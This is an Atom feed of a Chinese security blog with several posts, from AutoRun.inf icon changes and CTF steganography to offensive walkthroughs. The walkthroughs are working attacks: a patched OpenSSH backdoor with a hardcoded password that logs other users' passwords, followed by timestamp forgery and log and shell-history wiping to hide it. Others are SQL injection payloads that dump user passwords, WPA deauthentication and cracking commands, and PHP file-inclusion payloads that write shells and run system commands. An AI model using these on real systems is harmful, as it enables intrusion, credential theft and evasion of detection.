<content type="html"><![CDATA[<h1 id="AutoRun简介"><a href="#AutoRun简介" class="headerlink" title="AutoRun简介"></a>AutoRun简介</h1><p> AutoRun和AutoPlay是微软窗口系统的组件,其内容标示着系统在搜索到设备时可采取的行动。</p><p> AutoRun在Windows 95时首度露面,目的是帮助用户正确运行光盘上制作者想要运行的文件,另外AutoRun也能透过双击我的计算机内的设备图标启动AutoRun。但后来U盘病毒横行,微软发布更新关闭非光盘驱动器的AutoRun。</p><p> 在Windows XP之后,微软让用户方便选择相关应用程序,制作出如图形化接口方式让用户选择如何处理设备中的文件。</p><h1 id="AutoRun-inf文件"><a href="#AutoRun-inf文件" class="headerlink" title="AutoRun.inf文件"></a>AutoRun.inf文件</h1><p> autrun.inf是我们电脑使用中比较常见的文件之一 ,其作用是允许在双击磁盘时自动运行指定的某个文件。但是近几年出现了用autorun.inf文件传播木马或病毒,它通过使用者的误操作让目标程序执行,达到侵入电脑的目的,带来了很大的负面影响。</p><h1 id="AutoRun-inf的示例"><a href="#AutoRun-inf的示例" class="headerlink" title="AutoRun.inf的示例"></a>AutoRun.inf的示例</h1><pre><code>[autorun] open=setup.exe icon=setup.exe,0label=My install CD</code></pre><p>双击盘符时会运行setup.exe,而显示图标为setup.exe中第0个图标(即第1个图标),标签是My install CD。</p><h1 id="AutoRun-inf的默认激活"><a href="#AutoRun-inf的默认激活" class="headerlink" title="AutoRun.inf的默认激活"></a>AutoRun.inf的默认激活</h1><ul><li>插入设备时启动。</li><li>双击我的计算机设备时启动。</li><li>对我的计算机设备点击右键菜单中 “AutoRun” 项目时启动。</li><li>其他(如点击根目录文件夹)则不会启动。<h2 id="windows-XP-以前"><a href="#windows-XP-以前" class="headerlink" title="windows XP 以前"></a>windows XP 以前</h2></li><li>所有设备都会依照 Autorun.inf 启动。<h2 id="Windows-7"><a href="#Windows-7" class="headerlink" title="Windows 7"></a>Windows 7</h2></li><li>只有光盘会先运行 autorun.inf</li></ul><h1 id="利用autorun-inf给硬盘改图标及简易防病毒"><a href="#利用autorun-inf给硬盘改图标及简易防病毒" class="headerlink" title="利用autorun.inf给硬盘改图标及简易防病毒"></a>利用autorun.inf给硬盘改图标及简易防病毒</h1><h2 id="个性化磁盘—改图标"><a href="#个性化磁盘—改图标" class="headerlink" title="个性化磁盘—改图标"></a>个性化磁盘—改图标</h2><p>在对应磁盘的根目录新建一个记事本,然后修改里面内容</p><pre><code>[AUTORUN]ICON=drag0n.ico</code></pre><p>然后将其保存为autorun.inf(注意ico的文件名字符不要超过6位)</p><a id="more"></a><p>再将你想用的图标转换成ico文件,推荐分辨率不要超过48x48,然后一同放进同目录下,然后改名为fdragn.ico。</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190819105231.png" alt=""></p><h2 id="简易防病毒"><a href="#简易防病毒" class="headerlink" title="简易防病毒"></a>简易防病毒</h2><p>此时文件是显示在当前目录下的,可以使用Windows下的attrib命令给文件增加属性</p><pre><code>attrib指令的格式和常用参数为ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [[drive:] [path] filename] [/S [/D]]+ 设置属性。- 清除属性。R 只读文件属性。A 存档文件属性。S 系统文件属性。H 隐藏文件属性。I 无内容索引文件属性。[drive:][path][filename]指定要处理的文件属性。/S 处理当前文件夹及其子文件夹中的匹配文件。/D 处理文件夹。/L 处理符号链接和符号链接目标的属性。</code></pre><p>所以使用</p><pre><code>attrib +s +h +r autorun.inf</code></pre><p>给autorun.inf添加系统、隐藏和只读属性,防止病毒修改autorun.inf文件</p><pre><code>attrib +s +h drag0n.ico</code></pre><p>给drag0n.ico文件添加系统和隐藏属性,美观。</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190819105237.png" alt=""></p><p>如果还要修改的话,使用以下命令将其显示出来</p><pre><code>attrib -s -h -r autorun.infattrib -s -h fdrag0n.ico</code></pre>]]></content>
<summary type="html">
<h1 id="AutoRun简介"><a href="#AutoRun简介" class="headerlink" title="AutoRun简介"></a>AutoRun简介</h1><p> AutoRun和AutoPlay是微软窗口系统的组件,其内容标示着系统在搜索到设备时可采取的行动。</p>
<p> AutoRun在Windows 95时首度露面,目的是帮助用户正确运行光盘上制作者想要运行的文件,另外AutoRun也能透过双击我的计算机内的设备图标启动AutoRun。但后来U盘病毒横行,微软发布更新关闭非光盘驱动器的AutoRun。</p>
<p> 在Windows XP之后,微软让用户方便选择相关应用程序,制作出如图形化接口方式让用户选择如何处理设备中的文件。</p>
<h1 id="AutoRun-inf文件"><a href="#AutoRun-inf文件" class="headerlink" title="AutoRun.inf文件"></a>AutoRun.inf文件</h1><p> autrun.inf是我们电脑使用中比较常见的文件之一 ,其作用是允许在双击磁盘时自动运行指定的某个文件。但是近几年出现了用autorun.inf文件传播木马或病毒,它通过使用者的误操作让目标程序执行,达到侵入电脑的目的,带来了很大的负面影响。</p>
<h1 id="AutoRun-inf的示例"><a href="#AutoRun-inf的示例" class="headerlink" title="AutoRun.inf的示例"></a>AutoRun.inf的示例</h1><pre><code>[autorun]
open=setup.exe
icon=setup.exe,0
label=My install CD
</code></pre><p>双击盘符时会运行setup.exe,而显示图标为setup.exe中第0个图标(即第1个图标),标签是My install CD。</p>
<h1 id="AutoRun-inf的默认激活"><a href="#AutoRun-inf的默认激活" class="headerlink" title="AutoRun.inf的默认激活"></a>AutoRun.inf的默认激活</h1><ul>
<li>插入设备时启动。</li>
<li>双击我的计算机设备时启动。</li>
<li>对我的计算机设备点击右键菜单中 “AutoRun” 项目时启动。</li>
<li>其他(如点击根目录文件夹)则不会启动。<h2 id="windows-XP-以前"><a href="#windows-XP-以前" class="headerlink" title="windows XP 以前"></a>windows XP 以前</h2></li>
<li>所有设备都会依照 Autorun.inf 启动。<h2 id="Windows-7"><a href="#Windows-7" class="headerlink" title="Windows 7"></a>Windows 7</h2></li>
<li>只有光盘会先运行 autorun.inf</li>
</ul>
<h1 id="利用autorun-inf给硬盘改图标及简易防病毒"><a href="#利用autorun-inf给硬盘改图标及简易防病毒" class="headerlink" title="利用autorun.inf给硬盘改图标及简易防病毒"></a>利用autorun.inf给硬盘改图标及简易防病毒</h1><h2 id="个性化磁盘—改图标"><a href="#个性化磁盘—改图标" class="headerlink" title="个性化磁盘—改图标"></a>个性化磁盘—改图标</h2><p>在对应磁盘的根目录新建一个记事本,然后修改里面内容</p>
<pre><code>[AUTORUN]
ICON=drag0n.ico
</code></pre><p>然后将其保存为autorun.inf(注意ico的文件名字符不要超过6位)</p>
</summary>
</entry>
<entry>
<title>ctf常见隐写术总结</title>
<link href="http://fdrag0n.github.io/2018/07/30/ctf%E5%B8%B8%E8%A7%81%E9%9A%90%E5%86%99%E6%9C%AF%E6%80%BB%E7%BB%93/"/>
<id>http://fdrag0n.github.io/2018/07/30/ctf常见隐写术总结/</id>
<published>2018-07-30T03:57:03.000Z</published>
<updated>2019-08-19T03:00:30.632Z</updated>
<content type="html"><![CDATA[<p><strong>准备工具:winhex付费版(免费版功能有缺失),Stegsolve,MP3Steno等</strong></p><h1 id="ctf常见隐写术总结"><a href="#ctf常见隐写术总结" class="headerlink" title="ctf常见隐写术总结"></a>ctf常见隐写术总结</h1><h2 id="简单隐写:"><a href="#简单隐写:" class="headerlink" title="简单隐写:"></a>简单隐写:</h2><ol><li>右键查看图片属性,检查图片简介。</li><li>winhex打开,Ctrl+F查找有无flag明文。</li></ol><a id="more"></a><h2 id="文件类型:"><a href="#文件类型:" class="headerlink" title="文件类型:"></a>文件类型:</h2><p>给出的文件不一定是它后缀名显示的文件,所以应该先用winhex打开它确认文件种类</p><ol><li>JPEG (jpg),文件头:FFD8FF</li><li>PNG (png),文件头:89504E47</li><li>GIF (gif),文件头:47494638</li><li>Windows Bitmap (bmp),文件头:424D</li><li>ZIP Archive (zip),文件头:504B0304</li><li><p>RAR Archive (rar),文件头:52617221</p><h2 id="复合文件:"><a href="#复合文件:" class="headerlink" title="复合文件:"></a>复合文件:</h2><p>在kali里面使用binwalk工具即可查看<br>如:</p><p> root@kali:~# binwalk ‘/root/桌面/misc1.jpg’ </p><p> DECIMAL HEXADECIMAL DESCRIPTION</p><p> -——————————————————————————-<br> 0 0x0 JPEG image data, EXIF standard<br> 120xC TIFF image data, little-endian offset of first image directory: 8<br> 4413190x6BBE7 Zip archive data, encrypted at least v2.0 to extract, compressed size: 90598, uncompressed size: 91905, name: hidden.jpg<br> 5319570x81DF5 Zip archive data, encrypted at least v2.0 to extract, compressed size: 38092, uncompressed size: 38829, name: logo.png<br> 5702690x8B39D End of Zip archive</p></li></ol><p>可以看到有zip之类的文件在里面,所以直接利用binwalk提取,</p><p><code>binwalk -e</code></p><h2 id="图片高度"><a href="#图片高度" class="headerlink" title="图片高度"></a>图片高度</h2><p>一般这类的图片都会有明显的提示,包括但不限于箭头指向图片外,图片看上去不完整等。<br>根据对应文件种类找到其高度位进行修改。</p><ol><li>png文件,</li></ol><h2 id="多图层隐写"><a href="#多图层隐写" class="headerlink" title="多图层隐写"></a>多图层隐写</h2><p>最牛神器 <strong>zsteg</strong>毁天灭地</p><p>隐写术一大神器:<strong>stegsolve</strong></p><h3 id="LSB隐写"><a href="#LSB隐写" class="headerlink" title="LSB隐写"></a>LSB隐写</h3><ol><li>如果上文测试找不到flag的话,可以使用stegsolve打开文件,然后点击左右翻动的按钮,可能会出现flag。</li><li>提取低位信息,一般都藏在0,1,2这些低位里面,在软件功能选项中查看Analyse→Data Extract,逐个调试。</li></ol>]]></content>
<summary type="html">
<p><strong>准备工具:winhex付费版(免费版功能有缺失),Stegsolve,MP3Steno等</strong></p>
<h1 id="ctf常见隐写术总结"><a href="#ctf常见隐写术总结" class="headerlink" title="ctf常见隐写术总结"></a>ctf常见隐写术总结</h1><h2 id="简单隐写:"><a href="#简单隐写:" class="headerlink" title="简单隐写:"></a>简单隐写:</h2><ol>
<li>右键查看图片属性,检查图片简介。</li>
<li>winhex打开,Ctrl+F查找有无flag明文。</li>
</ol>
</summary>
</entry>
<entry>
<title>破解中兴电视盒子</title>
<link href="http://fdrag0n.github.io/2018/07/19/%E7%A0%B4%E8%A7%A3%E4%B8%AD%E5%85%B4%E7%94%B5%E8%A7%86%E7%9B%92%E5%AD%90/"/>
<id>http://fdrag0n.github.io/2018/07/19/破解中兴电视盒子/</id>
<published>2018-07-18T16:59:29.000Z</published>
<updated>2019-08-19T03:00:34.180Z</updated>
<content type="html"><![CDATA[<p>#记一次破解电信盒子</p><p>##型号 ZTEB860AV1.1<br>因为以前搞过家里的tcl电视,所以流程已经清楚</p><ol><li>开启网络adb调试</li><li>为所欲为</li></ol><a id="more"></a><p>###开始</p><ul><li>百度得知进入设置的密码为:6321<br>进入设置后连接WiFi,然后到设置里找到开启adb调试,结果发现开启adb居然也需要密码,不得不说这群人为了控制用户也是下了血本,还好百度找到有写好的软件,上链接</li></ul><ul><li>工具<a href="https://pan.baidu.com/s/1TbV688Vi2-WjdOWUKg_Mpg" title="百度云" target="_blank" rel="noopener">相关软件</a> </li><li><p>利用网络adb给电视盒子安装电视管理软件或者第三方桌面开始为所欲为。</p></li><li><p>在这里又发现一个问题,这边运营商将网线插口插在光猫的iptv上面,而那条路线是专线,无法正常使用,机顶盒开机会自动检测是否在这个网络下,不在就无法正常开机,所以每次开机的时候还得手动将设置中的网络设置改成有线连接,如果使用第三方应用则使用无线连接局域网即可,暂时没有想到更好地解决方案</p></li></ul>]]></content>
<summary type="html">
<p>#记一次破解电信盒子</p>
<p>##型号 ZTEB860AV1.1<br>因为以前搞过家里的tcl电视,所以流程已经清楚</p>
<ol>
<li>开启网络adb调试</li>
<li>为所欲为</li>
</ol>
</summary>
</entry>
<entry>
<title>SSH后门复现</title>
<link href="http://fdrag0n.github.io/2018/05/15/SSH%E5%90%8E%E9%97%A8%E5%A4%8D%E7%8E%B0/"/>
<id>http://fdrag0n.github.io/2018/05/15/SSH后门复现/</id>
<published>2018-05-15T12:01:46.000Z</published>
<updated>2019-08-19T03:00:40.735Z</updated>
<content type="html"><![CDATA[<p>#SSH后门复现</p><h3 id="最开始先查看自己的ssh版本"><a href="#最开始先查看自己的ssh版本" class="headerlink" title="最开始先查看自己的ssh版本"></a>最开始先查看自己的ssh版本</h3><pre><code>ssh -v</code></pre><a id="more"></a><h3 id="然后下载openssh和ssh后门"><a href="#然后下载openssh和ssh后门" class="headerlink" title="然后下载openssh和ssh后门"></a>然后下载openssh和ssh后门</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">wget http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz</span><br><span class="line">wget http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz</span><br><span class="line">tar zxvf openssh-5.9p1.tar.gz</span><br><span class="line">tar zxvf 0x06-openssh-5.9p1.patch.tar.gz</span><br><span class="line">cd openssh-5.9p1.patch/</span><br><span class="line">cp sshbd5.9p1.diff ../openssh-5.9p1</span><br><span class="line">cd ../openssh-5.9p1</span><br><span class="line">patch < sshbd5.9p1.diff //patch 后门</span><br></pre></td></tr></table></figure><p>这时有可能出现报错信息<br><strong>-bash: patch: command not found</strong><br>代表没有安装patch命令包,解决方案:</p><pre><code>yum -y install patch</code></pre><h3 id="备份SSH原始配置文件"><a href="#备份SSH原始配置文件" class="headerlink" title="备份SSH原始配置文件"></a>备份SSH原始配置文件</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old</span><br><span class="line">mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old</span><br></pre></td></tr></table></figure><h3 id="修改后门密码,和记录文件的位置"><a href="#修改后门密码,和记录文件的位置" class="headerlink" title="修改后门密码,和记录文件的位置"></a>修改后门密码,和记录文件的位置</h3><pre><code>vi includes.h</code></pre><p>找到并修改<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#define ILOG "/tmp/ilog"</span><br><span class="line">//记录登录到本机的用户名和密码</span><br><span class="line">#define OLOG "/tmp/olog"</span><br><span class="line">//记录本机登录到远程的用户名和密码</span><br><span class="line">#define SECRETPW "fdrag0n"</span><br><span class="line">//你后门的密码</span><br></pre></td></tr></table></figure></p><h3 id="修改SSH版本信息,改为第一步看到的"><a href="#修改SSH版本信息,改为第一步看到的" class="headerlink" title="修改SSH版本信息,改为第一步看到的"></a>修改SSH版本信息,改为第一步看到的</h3><pre><code>vi version.h</code></pre><h3 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h3><p>如果没有以上环境有可能会报错</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">yum install -y gcc</span><br><span class="line">yum install -y openssl openssl-devel pam-devel</span><br><span class="line">./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5</span><br></pre></td></tr></table></figure><p>如果出现报错信息中带有:<br><strong>configure: error: zlib.h missing – please install first or check config.log</strong>之类的信息<br>安装zib</p><pre><code>yum install -y zlib</code></pre><h3 id="安装并重启SSH"><a href="#安装并重启SSH" class="headerlink" title="安装并重启SSH"></a>安装并重启SSH</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">make && make install</span><br><span class="line">service sshd restart</span><br></pre></td></tr></table></figure><h3 id="简单处理记录"><a href="#简单处理记录" class="headerlink" title="简单处理记录"></a>简单处理记录</h3><h4 id="还原新配置文件为旧配置文件时间"><a href="#还原新配置文件为旧配置文件时间" class="headerlink" title="还原新配置文件为旧配置文件时间"></a>还原新配置文件为旧配置文件时间</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config</span><br><span class="line">touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config</span><br></pre></td></tr></table></figure><p>将ssh_config和sshd_config修改时间跟ssh_config.old和sshd_config.old一致,减少被发现的概率。</p><h4 id="清除apache日志"><a href="#清除apache日志" class="headerlink" title="清除apache日志"></a>清除apache日志</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">export HISTFILE=/dev/null </span><br><span class="line">export HISTSIZE=0 </span><br><span class="line">cd /etc/httpd/logs/ </span><br><span class="line">sed -i ‘/192.168.52.175/d’ access_log* </span><br><span class="line">echo >/root/.bash_history //清空操作日志</span><br></pre></td></tr></table></figure><h4 id="清除用户目录下的-bash-history文件"><a href="#清除用户目录下的-bash-history文件" class="headerlink" title="清除用户目录下的.bash_history文件"></a>清除用户目录下的.bash_history文件</h4><pre><code>vi .bash_history</code></pre><p>然后全部删除保存。</p>]]></content>
<summary type="html">
<p>#SSH后门复现</p>
<h3 id="最开始先查看自己的ssh版本"><a href="#最开始先查看自己的ssh版本" class="headerlink" title="最开始先查看自己的ssh版本"></a>最开始先查看自己的ssh版本</h3><pre><code>ssh -v
</code></pre>
</summary>
</entry>
<entry>
<title>sql手注步骤(非盲注)</title>
<link href="http://fdrag0n.github.io/2018/05/05/sql%E6%89%8B%E6%B3%A8%E6%AD%A5%E9%AA%A4/"/>
<id>http://fdrag0n.github.io/2018/05/05/sql手注步骤/</id>
<published>2018-05-05T03:52:16.000Z</published>
<updated>2019-08-19T03:00:47.758Z</updated>
<content type="html"><![CDATA[<h1 id="手注步骤"><a href="#手注步骤" class="headerlink" title="手注步骤"></a>手注步骤</h1><a id="more"></a><h2 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h2><p><strong>1.判断是否存在注入,注入是字符型还是数字型</strong></p><p><strong>2.猜解SQL查询语句中的字段数</strong></p><p><strong>3.确定显示的字段顺序</strong></p><p><strong>4.获取当前数据库</strong></p><p><strong>5.获取数据库中的表</strong></p><p><strong>6.获取表中的字段名</strong></p><p><strong>7.下载数据</strong></p><h2 id="1-判断是否存在注入,注入是字符型还是数字型"><a href="#1-判断是否存在注入,注入是字符型还是数字型" class="headerlink" title="1.判断是否存在注入,注入是字符型还是数字型"></a>1.判断是否存在注入,注入是字符型还是数字型</h2><p>判断注入类型:<strong>数字型,字符型</strong></p><h2 id="2-猜解SQL查询语句中的字段数"><a href="#2-猜解SQL查询语句中的字段数" class="headerlink" title="2.猜解SQL查询语句中的字段数"></a>2.猜解SQL查询语句中的字段数</h2><p>判断字段数:</p><pre><code>1′ or 1=1 order by 1,2,3,4,5 #</code></pre><p>数字累加,直到不出结果或者报错。</p><hr><p><strong>注释常常使用<code>--+</code>或者<code>#</code>或者<code>%23</code></strong></p><hr><p>或者用:</p><pre><code>-1′ union select 1,2 #</code></pre><hr><p><strong>两个sql语句进行联合操作时,当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来</strong></p><hr><p>顺路进行下一步</p><h2 id="3-确定显示的字段顺序"><a href="#3-确定显示的字段顺序" class="headerlink" title="3.确定显示的字段顺序"></a>3.确定显示的字段顺序</h2><pre><code>-1′ union select 1,2 #</code></pre><h2 id="4-获取当前数据库"><a href="#4-获取当前数据库" class="headerlink" title="4.获取当前数据库"></a>4.获取当前数据库</h2><pre><code>-1′ union select 1,database() #</code></pre><h2 id="5-获取数据库中的表"><a href="#5-获取数据库中的表" class="headerlink" title="5.获取数据库中的表"></a>5.获取数据库中的表</h2><pre><code>-1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #</code></pre><p>从information_schema中查找表名</p><hr><p><strong>进行联合查询时要将查询用的语句放在最后一项</strong></p><hr><h2 id="6-获取表中的字段名"><a href="#6-获取表中的字段名" class="headerlink" title="6.获取表中的字段名"></a>6.获取表中的字段名</h2><pre><code>-1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #</code></pre><p>爆users表内的表名</p><h2 id="7-下载数据"><a href="#7-下载数据" class="headerlink" title="7.下载数据"></a>7.下载数据</h2><pre><code>-1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #</code></pre><p>从users里面取出所有用户的user_id,first_name,last_name,password的数据</p>]]></content>
<summary type="html">
<h1 id="手注步骤"><a href="#手注步骤" class="headerlink" title="手注步骤"></a>手注步骤</h1>
</summary>
<category term="sql" scheme="http://fdrag0n.github.io/categories/sql/"/>
<category term="sql" scheme="http://fdrag0n.github.io/tags/sql/"/>
</entry>
<entry>
<title>利用kali破解wpa/wpa2加密的WIFI(爆破美学)</title>
<link href="http://fdrag0n.github.io/2018/05/01/%E5%88%A9%E7%94%A8kali%E7%A0%B4%E8%A7%A3wpa-wpa2%E5%8A%A0%E5%AF%86%E7%9A%84WIFI%EF%BC%88%E7%88%86%E7%A0%B4%E7%BE%8E%E5%AD%A6%EF%BC%89/"/>
<id>http://fdrag0n.github.io/2018/05/01/利用kali破解wpa-wpa2加密的WIFI(爆破美学)/</id>
<published>2018-05-01T14:26:38.000Z</published>
<updated>2019-08-19T03:00:57.541Z</updated>
<content type="html"><![CDATA[<h1 id="利用kali破解wpa-wpa2加密的WIFI(爆破美学)"><a href="#利用kali破解wpa-wpa2加密的WIFI(爆破美学)" class="headerlink" title="利用kali破解wpa/wpa2加密的WIFI(爆破美学)"></a>利用kali破解wpa/wpa2加密的WIFI(爆破美学)</h1><h2 id="硬件准备阶段:"><a href="#硬件准备阶段:" class="headerlink" title="硬件准备阶段:"></a>硬件准备阶段:</h2><p>因为用vm安装的kali不支持笔记本内置的无限网卡所以需要购买kali支持的网卡,博主买的是<strong>RT3070L芯片组</strong>的网卡,某宝上面无壳的只要20元,加壳才25元。</p><a id="more"></a><p>在kali中必须识别出网卡,使用<strong>ifconfig</strong>查看网卡信息,wlan0为无线网卡。<img src="https://s1.ax1x.com/2018/05/01/CJh0tx.jpg" alt="CJh0tx.jpg"></p><h2 id="攻击准备阶段:"><a href="#攻击准备阶段:" class="headerlink" title="攻击准备阶段:"></a>攻击准备阶段:</h2><h3 id="开启网卡监听模式:"><a href="#开启网卡监听模式:" class="headerlink" title="开启网卡监听模式:"></a>开启网卡监听模式:</h3><pre><code>airmon-ng start wlan0</code></pre><p>如果成功的话,网卡名称会变成wlan0mon<br><img src="https://s1.ax1x.com/2018/05/01/CJhwA1.jpg" alt="CJhwA1.jpg"></p><h3 id="扫描热点:"><a href="#扫描热点:" class="headerlink" title="扫描热点:"></a>扫描热点:</h3><pre><code>airodump-ng wlan0mon</code></pre><p>可以看到如图信息[<img src="https://s1.ax1x.com/2018/05/01/CJha7R.md.jpg" alt="CJha7R.md.jpg"></p><h3 id="抓握手包:"><a href="#抓握手包:" class="headerlink" title="抓握手包:"></a>抓握手包:</h3><p>c代表信道,bssid为mac地址,w参数指的是抓到的包放的目录以及包的名字。</p><pre><code>airodump-ng wlan0mon -c 4 --bssid XX:XX:XX:XX -w /root-c 选择信道,对应上图CH--bssid 需要破解的wifi的mac地址-w cap文件名及路径wlan0mon 启用监听模式的网卡名</code></pre><p>当有人连接时就能抓到握手包。<img src="https://s1.ax1x.com/2018/05/01/CJhUB9.jpg" alt="CJhUB9.jpg"></p><h4 id="如果对面都在使用wifi,没人连接怎么办?"><a href="#如果对面都在使用wifi,没人连接怎么办?" class="headerlink" title="如果对面都在使用wifi,没人连接怎么办?"></a>如果对面都在使用wifi,没人连接怎么办?</h4><p>通过以下命令断开设备与WiFi的连接</p><pre><code>aireplay-ng -0 20 -a A8:6B:7C:19:9F:D0 -c 4C:49:E3:D8:FD:7F wlan0mon-0 death(强制下线模式),20为执行次数-c 被断网的客户机MAC-a WIFI热点的mac</code></pre><p>抓包成功后白圈出现信息。<br><img src="https://s1.ax1x.com/2018/05/01/CJhUB9.jpg" alt="CJhUB9.jpg"></p><h3 id="爆破:"><a href="#爆破:" class="headerlink" title="爆破:"></a>爆破:</h3><h4 id="kali:"><a href="#kali:" class="headerlink" title="kali:"></a>kali:</h4><p>利用aircrack-ng命令</p><pre><code>aircrack-ng -w 字典 握手包</code></pre><p>cpu跑这个破解速度有些慢。</p><h4 id="windows:"><a href="#windows:" class="headerlink" title="windows:"></a>windows:</h4><h5 id="神器1:"><a href="#神器1:" class="headerlink" title="神器1:"></a>神器1:</h5><p>EWSA,然而7.x版本虽然支持gpu加速,然而没有破解版软件,只能查看密码前两位,收费299$(贵死人)</p><h5 id="神器2:"><a href="#神器2:" class="headerlink" title="神器2:"></a>神器2:</h5><p>oclHashcat,使用方法有些复杂,是一个win下面的使用命令行的工具,破解速度十分可观。<br>有国人开发了中文版的UI,减少了使用成本,链接:<a href="https://www.iteknical.com/hashcat-gui-cn/" target="_blank" rel="noopener">HashcatGUI_cn – HashcatGUI 中文版</a></p>]]></content>
<summary type="html">
<h1 id="利用kali破解wpa-wpa2加密的WIFI(爆破美学)"><a href="#利用kali破解wpa-wpa2加密的WIFI(爆破美学)" class="headerlink" title="利用kali破解wpa/wpa2加密的WIFI(爆破美学)"></a>利用kali破解wpa/wpa2加密的WIFI(爆破美学)</h1><h2 id="硬件准备阶段:"><a href="#硬件准备阶段:" class="headerlink" title="硬件准备阶段:"></a>硬件准备阶段:</h2><p>因为用vm安装的kali不支持笔记本内置的无限网卡所以需要购买kali支持的网卡,博主买的是<strong>RT3070L芯片组</strong>的网卡,某宝上面无壳的只要20元,加壳才25元。</p>
</summary>
<category term="kali" scheme="http://fdrag0n.github.io/categories/kali/"/>
<category term="kali" scheme="http://fdrag0n.github.io/tags/kali/"/>
</entry>
<entry>
<title>文件包含漏洞常用命令</title>
<link href="http://fdrag0n.github.io/2018/04/09/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/"/>
<id>http://fdrag0n.github.io/2018/04/09/文件包含漏洞常用命令/</id>
<published>2018-04-09T08:56:35.000Z</published>
<updated>2019-08-19T03:01:02.385Z</updated>
<content type="html"><![CDATA[<h1 id="主要包含形式"><a href="#主要包含形式" class="headerlink" title="主要包含形式"></a>主要包含形式</h1><h2 id="1-包含本地文件"><a href="#1-包含本地文件" class="headerlink" title="1.包含本地文件"></a>1.包含本地文件</h2><p>payload:</p><a id="more"></a><pre><code>?page=C:\oneword?file=C:\boot.ini(Windows查看系统版本)?file=C:\WindowsSystem32inetsrvMetaBase.xml(Windows查看IIS配置文件)</code></pre><h2 id="2-包含远程文件"><a href="#2-包含远程文件" class="headerlink" title="2.包含远程文件"></a>2.包含远程文件</h2><p>payload:</p><pre><code>?url=http://www.bbb.com/2.txt?url=[http|https|ftp]://www.bbb.com/2.txt(可以有三种,http、https、ftp)</code></pre><h2 id="3-伪协议"><a href="#3-伪协议" class="headerlink" title="3.伪协议"></a>3.伪协议</h2><p>1) php://input</p><p>说明:</p><p>用来接收POST数据。我们能够通过input把我们的语句输入上去然后执行。</p><p>条件:</p><p>php <5.0 ,allow_url_include=Off 情况下也可以用</p><p>php > 5.0,只有在allow_url_fopen=On 时才能使用</p><p>用例1 增加一句话:</p><p>URL:</p><pre><code>http://localhost/include/file.php?file=php://input</code></pre><p>POST:</p><pre><code><?php fputs(fopen("shell.php","a"),"<?php phpinfo();?>") ?></code></pre><p>用例2 增加文件:</p><p>URL:<br><code>http://localhost/include/file.php?file=php://input</code><br>POST:<br><code><?php fputs(fopen("oneword.php","w"),"<?php phpinfo();?>") ?></code><br>这里fopen参数为w,可新建一个文件。</p><p>用例3 执行系统命令:</p><p>URL:<br><code>http://localhost/include/file.php?file=php://input</code><br>POST:<br><code><?php system('ipconfig');?></code></p><hr><p>2)data://</p><p>说明:</p><p>这是一种数据流封装器,data:URI schema(URL schema可以是很多形式)</p><p>利用data://伪协议进行代码执行的思路原理和php://是类似的,都是利用了PHP中的流的概念,将原本的include的文件流重定向到了用户可控制的输入流中</p><p>条件:</p><p>allow_url_include=On<br>php > 5.2</p><hr><p>3)<strong>php://filter</strong></p><p>说明:</p><p>这个语句用来查看源码。直接包含php文件时会被解析,不能看到源码,所以用filter来读取,不过要先base64加密传输过来:</p><pre><code>?page=php://filter/read=convert.base64-encode/resource=php.ini</code></pre><p>访问上述URL后会返回config.php中经过Base64加密后的字符串,解密即可得到源码</p><p><strong>payload:</strong></p><pre><code>http://localhost/file.php?file=php://filter/read=convert.base64-encode/resource=file.php</code></pre><p>资料来源:<br><a href="https://www.anquanke.com/post/id/86123" title="参考网站" target="_blank" rel="noopener">https://www.anquanke.com/post/id/86123</a></p>]]></content>
<summary type="html">
<h1 id="主要包含形式"><a href="#主要包含形式" class="headerlink" title="主要包含形式"></a>主要包含形式</h1><h2 id="1-包含本地文件"><a href="#1-包含本地文件" class="headerlink" title="1.包含本地文件"></a>1.包含本地文件</h2><p>payload:</p>
</summary>
</entry>
<entry>
<title>打造手机渗透神器kali-linux-nethunter安装</title>
<link href="http://fdrag0n.github.io/2018/03/10/%E6%89%93%E9%80%A0%E6%89%8B%E6%9C%BA%E6%B8%97%E9%80%8F%E7%A5%9E%E5%99%A8kali-linux-nethunter%E5%AE%89%E8%A3%85/"/>
<id>http://fdrag0n.github.io/2018/03/10/打造手机渗透神器kali-linux-nethunter安装/</id>
<published>2018-03-10T04:59:57.000Z</published>
